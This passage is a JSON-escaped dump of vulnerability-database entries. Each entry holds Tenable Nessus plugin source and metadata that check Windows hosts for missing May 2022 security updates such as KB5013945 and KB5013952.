\"CVE-2022-22013\",\n \"CVE-2022-22014\",\n \"CVE-2022-22015\",\n \"CVE-2022-22016\",\n \"CVE-2022-22017\",\n \"CVE-2022-22019\",\n \"CVE-2022-23270\",\n \"CVE-2022-23279\",\n \"CVE-2022-24466\",\n \"CVE-2022-26913\",\n \"CVE-2022-26923\",\n \"CVE-2022-26925\",\n \"CVE-2022-26926\",\n \"CVE-2022-26927\",\n \"CVE-2022-26930\",\n \"CVE-2022-26931\",\n \"CVE-2022-26933\",\n \"CVE-2022-26934\",\n \"CVE-2022-26935\",\n \"CVE-2022-26936\",\n \"CVE-2022-26940\",\n \"CVE-2022-29103\",\n \"CVE-2022-29104\",\n \"CVE-2022-29112\",\n \"CVE-2022-29113\",\n \"CVE-2022-29114\",\n \"CVE-2022-29115\",\n \"CVE-2022-29116\",\n \"CVE-2022-29121\",\n \"CVE-2022-29125\",\n \"CVE-2022-29126\",\n \"CVE-2022-29127\",\n \"CVE-2022-29128\",\n \"CVE-2022-29129\",\n \"CVE-2022-29130\",\n \"CVE-2022-29131\",\n \"CVE-2022-29132\",\n \"CVE-2022-29133\",\n \"CVE-2022-29137\",\n \"CVE-2022-29139\",\n 
\"CVE-2022-29140\",\n \"CVE-2022-29141\",\n \"CVE-2022-30138\"\n );\n script_xref(name:\"MSKB\", value:\"5013943\");\n script_xref(name:\"MSFT\", value:\"MS22-5013943\");\n script_xref(name:\"IAVA\", value:\"2022-A-0204-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0203-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/22\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/09/08\");\n\n script_name(english:\"KB5013943: Windows 11 Security Update (May 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5013943. It is, therefore, affected by multiple vulnerabilities\n\n - Windows LDAP Remote Code Execution Vulnerability (CVE-2022-22012, CVE-2022-22013, CVE-2022-22014,\n CVE-2022-29128, CVE-2022-29129, CVE-2022-29130, CVE-2022-29131, CVE-2022-29137, CVE-2022-29139,\n CVE-2022-29141)\n\n - Windows Kernel Elevation of Privilege Vulnerability (CVE-2022-29133)\n\n - Windows Graphics Component Remote Code Execution Vulnerability (CVE-2022-26927)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5013943\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5013943\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-29130\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-05';\nkbs = make_list(\n '5013943'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:22000,\n rollup_date:'05_2022',\n bulletin:bulletin,\n rollup_kb_list:[5013943])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, 
value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-19T22:27:38", "description": "The remote Windows host is missing security update 5013945. It is, therefore, affected by multiple vulnerabilities\n\n - Windows LDAP Remote Code Execution Vulnerability (CVE-2022-22012, CVE-2022-22013, CVE-2022-22014, CVE-2022-29128, CVE-2022-29129, CVE-2022-29130, CVE-2022-29131, CVE-2022-29137, CVE-2022-29139, CVE-2022-29141)\n\n - Windows Graphics Component Remote Code Execution Vulnerability (CVE-2022-26927)\n\n - Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2022-26923)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T00:00:00", "type": "nessus", "title": "KB5013945: Windows 10 version 1909 Security Update (May 2022)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21972", "CVE-2022-22011", "CVE-2022-22012", "CVE-2022-22013", "CVE-2022-22014", "CVE-2022-22015", "CVE-2022-22016", "CVE-2022-22019", "CVE-2022-23270", "CVE-2022-23279", "CVE-2022-24466", "CVE-2022-26913", "CVE-2022-26923", "CVE-2022-26925", "CVE-2022-26926", "CVE-2022-26927", "CVE-2022-26930", "CVE-2022-26931", "CVE-2022-26933", "CVE-2022-26934", "CVE-2022-26935", "CVE-2022-26936", "CVE-2022-29103", "CVE-2022-29104", "CVE-2022-29105", "CVE-2022-29112", "CVE-2022-29113", "CVE-2022-29114", "CVE-2022-29115", "CVE-2022-29121", "CVE-2022-29125", "CVE-2022-29126", "CVE-2022-29127", "CVE-2022-29128", "CVE-2022-29129", "CVE-2022-29130", "CVE-2022-29131", "CVE-2022-29132", "CVE-2022-29137", "CVE-2022-29139", "CVE-2022-29140", "CVE-2022-29141", "CVE-2022-29142", "CVE-2022-30138"], "modified": "2022-08-19T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_MAY_5013945.NASL", "href": "https://www.tenable.com/plugins/nessus/160938", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(160938);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/19\");\n\n script_cve_id(\n \"CVE-2022-21972\",\n \"CVE-2022-22011\",\n \"CVE-2022-22012\",\n \"CVE-2022-22013\",\n \"CVE-2022-22014\",\n \"CVE-2022-22015\",\n \"CVE-2022-22016\",\n \"CVE-2022-22019\",\n \"CVE-2022-23270\",\n \"CVE-2022-23279\",\n \"CVE-2022-24466\",\n \"CVE-2022-26913\",\n \"CVE-2022-26923\",\n \"CVE-2022-26925\",\n \"CVE-2022-26926\",\n \"CVE-2022-26927\",\n \"CVE-2022-26930\",\n \"CVE-2022-26931\",\n \"CVE-2022-26933\",\n \"CVE-2022-26934\",\n \"CVE-2022-26935\",\n \"CVE-2022-26936\",\n \"CVE-2022-29103\",\n \"CVE-2022-29104\",\n \"CVE-2022-29105\",\n \"CVE-2022-29112\",\n \"CVE-2022-29113\",\n \"CVE-2022-29114\",\n \"CVE-2022-29115\",\n \"CVE-2022-29121\",\n \"CVE-2022-29125\",\n \"CVE-2022-29126\",\n \"CVE-2022-29127\",\n \"CVE-2022-29128\",\n \"CVE-2022-29129\",\n \"CVE-2022-29130\",\n \"CVE-2022-29131\",\n \"CVE-2022-29132\",\n \"CVE-2022-29137\",\n \"CVE-2022-29139\",\n \"CVE-2022-29140\",\n \"CVE-2022-29141\",\n \"CVE-2022-29142\",\n \"CVE-2022-30138\"\n );\n script_xref(name:\"MSKB\", value:\"5013945\");\n script_xref(name:\"MSFT\", value:\"MS22-5013945\");\n script_xref(name:\"IAVA\", value:\"2022-A-0204-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0203-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/22\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/09/08\");\n\n script_name(english:\"KB5013945: Windows 10 version 1909 Security Update (May 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5013945. 
It is, therefore, affected by multiple vulnerabilities\n\n - Windows LDAP Remote Code Execution Vulnerability (CVE-2022-22012, CVE-2022-22013, CVE-2022-22014,\n CVE-2022-29128, CVE-2022-29129, CVE-2022-29130, CVE-2022-29131, CVE-2022-29137, CVE-2022-29139,\n CVE-2022-29141)\n\n - Windows Graphics Component Remote Code Execution Vulnerability (CVE-2022-26927)\n\n - Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2022-26923)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5013945\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5013945\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-29130\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"false\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-05';\nkbs = make_list(\n '5013945'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:18363,\n rollup_date:'05_2022',\n bulletin:bulletin,\n rollup_kb_list:[5013945])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-20T00:26:57", "description": "The remote Windows host is missing security update 5013952. 
It is, therefore, affected by multiple vulnerabilities\n\n - Windows LDAP Remote Code Execution Vulnerability (CVE-2022-22012, CVE-2022-22013, CVE-2022-22014, CVE-2022-29128, CVE-2022-29129, CVE-2022-29130, CVE-2022-29137, CVE-2022-29139, CVE-2022-29141)\n\n - Windows Network File System Remote Code Execution Vulnerability (CVE-2022-26937)\n\n - Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2022-26923)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T00:00:00", "type": "nessus", "title": "KB5013952: Windows 10 Version 1607 and Windows Server 2016 Security Update (May 2022)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21972", "CVE-2022-22011", "CVE-2022-22012", "CVE-2022-22013", "CVE-2022-22014", "CVE-2022-22015", "CVE-2022-22016", "CVE-2022-22019", "CVE-2022-23270", "CVE-2022-24466", "CVE-2022-26923", "CVE-2022-26925", "CVE-2022-26926", "CVE-2022-26930", "CVE-2022-26931", "CVE-2022-26932", "CVE-2022-26933", 
"CVE-2022-26934", "CVE-2022-26935", "CVE-2022-26936", "CVE-2022-26937", "CVE-2022-26938", "CVE-2022-26939", "CVE-2022-29102", "CVE-2022-29103", "CVE-2022-29104", "CVE-2022-29105", "CVE-2022-29106", "CVE-2022-29112", "CVE-2022-29114", "CVE-2022-29115", "CVE-2022-29120", "CVE-2022-29121", "CVE-2022-29122", "CVE-2022-29123", "CVE-2022-29125", "CVE-2022-29126", "CVE-2022-29127", "CVE-2022-29128", "CVE-2022-29129", "CVE-2022-29130", "CVE-2022-29132", "CVE-2022-29134", "CVE-2022-29135", "CVE-2022-29137", "CVE-2022-29138", "CVE-2022-29139", "CVE-2022-29140", "CVE-2022-29141", "CVE-2022-29150", "CVE-2022-29151", "CVE-2022-30130", "CVE-2022-30138"], "modified": "2022-11-18T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_MAY_5013952.NASL", "href": "https://www.tenable.com/plugins/nessus/160934", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(160934);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/11/18\");\n\n script_cve_id(\n \"CVE-2022-21972\",\n \"CVE-2022-22011\",\n \"CVE-2022-22012\",\n \"CVE-2022-22013\",\n \"CVE-2022-22014\",\n \"CVE-2022-22015\",\n \"CVE-2022-22016\",\n \"CVE-2022-22019\",\n \"CVE-2022-23270\",\n \"CVE-2022-24466\",\n \"CVE-2022-26923\",\n \"CVE-2022-26925\",\n \"CVE-2022-26926\",\n \"CVE-2022-26930\",\n \"CVE-2022-26931\",\n \"CVE-2022-26932\",\n \"CVE-2022-26933\",\n \"CVE-2022-26934\",\n \"CVE-2022-26935\",\n \"CVE-2022-26936\",\n \"CVE-2022-26937\",\n \"CVE-2022-26938\",\n \"CVE-2022-26939\",\n \"CVE-2022-29102\",\n \"CVE-2022-29103\",\n \"CVE-2022-29104\",\n \"CVE-2022-29105\",\n \"CVE-2022-29106\",\n \"CVE-2022-29112\",\n \"CVE-2022-29114\",\n \"CVE-2022-29115\",\n \"CVE-2022-29120\",\n \"CVE-2022-29121\",\n \"CVE-2022-29122\",\n 
\"CVE-2022-29123\",\n \"CVE-2022-29125\",\n \"CVE-2022-29126\",\n \"CVE-2022-29127\",\n \"CVE-2022-29128\",\n \"CVE-2022-29129\",\n \"CVE-2022-29130\",\n \"CVE-2022-29132\",\n \"CVE-2022-29134\",\n \"CVE-2022-29135\",\n \"CVE-2022-29137\",\n \"CVE-2022-29138\",\n \"CVE-2022-29139\",\n \"CVE-2022-29140\",\n \"CVE-2022-29141\",\n \"CVE-2022-29150\",\n \"CVE-2022-29151\",\n \"CVE-2022-30130\",\n \"CVE-2022-30138\"\n );\n script_xref(name:\"MSKB\", value:\"5013952\");\n script_xref(name:\"MSFT\", value:\"MS22-5013952\");\n script_xref(name:\"IAVA\", value:\"2022-A-0204-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0203-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0202-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/22\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/09/08\");\n\n script_name(english:\"KB5013952: Windows 10 Version 1607 and Windows Server 2016 Security Update (May 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5013952. 
It is, therefore, affected by multiple vulnerabilities\n\n - Windows LDAP Remote Code Execution Vulnerability (CVE-2022-22012, CVE-2022-22013, CVE-2022-22014,\n CVE-2022-29128, CVE-2022-29129, CVE-2022-29130, CVE-2022-29137, CVE-2022-29139, CVE-2022-29141)\n\n - Windows Network File System Remote Code Execution Vulnerability (CVE-2022-26937)\n\n - Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2022-26923)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5013952\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5013952\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-29130\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This 
script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-05';\nkbs = make_list(\n '5013952'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:14393,\n rollup_date:'05_2022',\n bulletin:bulletin,\n rollup_kb_list:[5013952])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-19T22:27:20", "description": "The remote Windows host is missing security update 5013944. 
It is, therefore, affected by multiple vulnerabilities\n\n - Windows LDAP Remote Code Execution Vulnerability (CVE-2022-22012, CVE-2022-22013, CVE-2022-22014, CVE-2022-29128, CVE-2022-29129, CVE-2022-29130, CVE-2022-29131, CVE-2022-29137, CVE-2022-29139, CVE-2022-29141)\n\n - Windows Network File System Remote Code Execution Vulnerability (CVE-2022-26937)\n\n - Windows Graphics Component Remote Code Execution Vulnerability (CVE-2022-26927)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T00:00:00", "type": "nessus", "title": "KB5013944: Windows Server 2022 Security Update (May 2022)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21972", "CVE-2022-22012", "CVE-2022-22013", "CVE-2022-22014", "CVE-2022-22015", "CVE-2022-22016", "CVE-2022-22017", "CVE-2022-22019", "CVE-2022-23270", "CVE-2022-23279", "CVE-2022-24466", "CVE-2022-26913", "CVE-2022-26923", "CVE-2022-26925", "CVE-2022-26926", "CVE-2022-26927", "CVE-2022-26930", "CVE-2022-26931", 
"CVE-2022-26932", "CVE-2022-26933", "CVE-2022-26934", "CVE-2022-26935", "CVE-2022-26936", "CVE-2022-26937", "CVE-2022-26938", "CVE-2022-26939", "CVE-2022-26940", "CVE-2022-29102", "CVE-2022-29103", "CVE-2022-29104", "CVE-2022-29106", "CVE-2022-29112", "CVE-2022-29114", "CVE-2022-29115", "CVE-2022-29120", "CVE-2022-29121", "CVE-2022-29122", "CVE-2022-29123", "CVE-2022-29125", "CVE-2022-29126", "CVE-2022-29127", "CVE-2022-29128", "CVE-2022-29129", "CVE-2022-29130", "CVE-2022-29131", "CVE-2022-29132", "CVE-2022-29134", "CVE-2022-29135", "CVE-2022-29137", "CVE-2022-29138", "CVE-2022-29139", "CVE-2022-29140", "CVE-2022-29141", "CVE-2022-29142", "CVE-2022-29150", "CVE-2022-29151", "CVE-2022-30138"], "modified": "2022-08-19T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_MAY_5013944.NASL", "href": "https://www.tenable.com/plugins/nessus/160929", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(160929);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/19\");\n\n script_cve_id(\n \"CVE-2022-21972\",\n \"CVE-2022-22012\",\n \"CVE-2022-22013\",\n \"CVE-2022-22014\",\n \"CVE-2022-22015\",\n \"CVE-2022-22016\",\n \"CVE-2022-22017\",\n \"CVE-2022-22019\",\n \"CVE-2022-23270\",\n \"CVE-2022-23279\",\n \"CVE-2022-24466\",\n \"CVE-2022-26913\",\n \"CVE-2022-26923\",\n \"CVE-2022-26925\",\n \"CVE-2022-26926\",\n \"CVE-2022-26927\",\n \"CVE-2022-26930\",\n \"CVE-2022-26931\",\n \"CVE-2022-26932\",\n \"CVE-2022-26933\",\n \"CVE-2022-26934\",\n \"CVE-2022-26935\",\n \"CVE-2022-26936\",\n \"CVE-2022-26937\",\n \"CVE-2022-26938\",\n \"CVE-2022-26939\",\n \"CVE-2022-26940\",\n \"CVE-2022-29102\",\n \"CVE-2022-29103\",\n \"CVE-2022-29104\",\n \"CVE-2022-29106\",\n \"CVE-2022-29112\",\n \"CVE-2022-29114\",\n \"CVE-2022-29115\",\n \"CVE-2022-29120\",\n \"CVE-2022-29121\",\n \"CVE-2022-29122\",\n \"CVE-2022-29123\",\n \"CVE-2022-29125\",\n \"CVE-2022-29126\",\n \"CVE-2022-29127\",\n \"CVE-2022-29128\",\n \"CVE-2022-29129\",\n \"CVE-2022-29130\",\n \"CVE-2022-29131\",\n \"CVE-2022-29132\",\n \"CVE-2022-29134\",\n \"CVE-2022-29135\",\n \"CVE-2022-29137\",\n \"CVE-2022-29138\",\n \"CVE-2022-29139\",\n \"CVE-2022-29140\",\n \"CVE-2022-29141\",\n \"CVE-2022-29142\",\n \"CVE-2022-29150\",\n \"CVE-2022-29151\",\n \"CVE-2022-30138\"\n );\n script_xref(name:\"MSKB\", value:\"5013944\");\n script_xref(name:\"MSFT\", value:\"MS22-5013944\");\n script_xref(name:\"IAVA\", value:\"2022-A-0204-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0203-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/22\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/09/08\");\n\n 